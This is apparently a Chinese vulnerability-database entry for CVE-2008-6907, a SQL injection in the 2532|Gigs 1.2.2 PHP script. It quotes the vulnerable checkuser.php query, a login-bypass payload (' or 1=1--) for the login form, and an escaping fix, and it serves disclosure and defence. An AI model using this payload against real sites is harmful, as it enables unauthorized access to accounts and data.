2532|Gigs 'index.php'多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117085 漏洞类型 SQL注入
发布时间 2008-12-18 更新时间 2009-08-06
CVE编号 CVE-2008-6907 CNNVD-ID CNNVD-200908-002
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/7511
https://cxsecurity.com/issue/WLB-2009080083
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200908-002
|漏洞详情
当magic_quotes_gpc无效时,2532designs2532|Gigs1.2.2Stable中的checkuser.php中的多个SQL注入漏洞,允许远程攻击者借助(1)用户名参数,和(2)密码参数,执行任意的SQL指令。这两个参数都可任意通过由index.php生成的form而进行访问。
|漏洞EXP
/* ------------------------------------------------------------------------------------------------
 * 2532|Gigs 1.2.2 Stable Remote Login Bypass Vulnerability
 * ------------------------------------------------------------------------------------------------
 * by athos - staker[at]hotmail[dot]it
 * http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1
 * ------------------------------------------------------------------------------------------------
 * File Vuln checkuser.php
 *
 * 16. $username = $_POST['username'];
 * 17. $password = $_POST['password'];
 * ... 
 * 41. $query = "SELECT * FROM $dbt_users WHERE username = '$username' AND password = '$password'" ;
 * 42. $result = mysql_query($query) or die ( "Error in query: $query. " . mysql_error() );
 * ------------------------------------------------------------------------------------------------
 * Exploit
 *
 * http://[host]/[path]/index.php?id=login
 * 
 * Username: [username]
 * Password: [' or 1=1--]
 * ------------------------------------------------------------------------------------------------
 * Fix (Examples)
 *  
 * $username = mysql_real_escape_string($_POST['username']); 
 * $password = mysql_real_escape_string($_POST['password']);
 * 
 * ------------------------------------------------------------------------------------------------
 */

# milw0rm.com [2008-12-18]
|参考资料

来源:XF
名称:2532gigs-checkuser-sql-injection(47491)
链接:http://xforce.iss.net/xforce/xfdb/47491
来源:BID
名称:32913
链接:http://www.securityfocus.com/bid/32913
来源:MILW0RM
名称:7511
链接:http://www.milw0rm.com/exploits/7511
来源:SECUNIA
名称:26585
链接:http://secunia.com/advisories/26585